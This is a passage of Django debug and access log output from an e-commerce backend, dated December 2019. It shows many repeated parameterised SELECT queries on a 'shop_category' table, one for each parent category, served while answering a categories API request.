31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:25:45,129 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:25:45,131 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:25:45,134 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:25:45,136 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:25:45,138 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:25:45,142 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:25:45,144 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:25:45,146 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:25:45,148 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:25:45,150 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:25:45,154 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:25:45,156 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:25:45,158 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:25:45,160 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:25:45,163 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:25:45,166 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:25:45,168 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:25:45,171 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:25:45,173 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:25:45,175 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:25:45,177 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:25:45,180 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:25:45,182 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:25:45,185 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:25:45,187 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:25:45,189 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:25:45,192 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:25:45,194 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:25:45,197 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:25:45,199 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:25:45,201 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:25:45,205 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:25:45,207 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:25:45,209 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:25:45,211 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:25:45,213 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:25:45,215 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:25:45,218 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:25:45,220 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:25:45,222 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:25:45,225 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:25:45,227 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:25:45] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:25:45] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [27/Dec/2019 07:25:45] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 DEBUG 2019-12-27 07:25:49,270 utils 31585 139762228295424 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:25:49,280 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:25:49,285 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:25:49,288 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:25:49,294 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:25:49,297 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:25:49,302 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:25:49,305 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:25:49,309 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:25:49,313 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:25:49,316 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:25:49,319 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:25:49,322 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:25:49,325 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:25:49,330 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:25:49,333 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:25:49,336 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:25:49,339 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:25:49,342 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:25:49,347 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:25:49,350 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:25:49,353 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:25:49,356 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:25:49,359 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:25:49,362 utils 31585 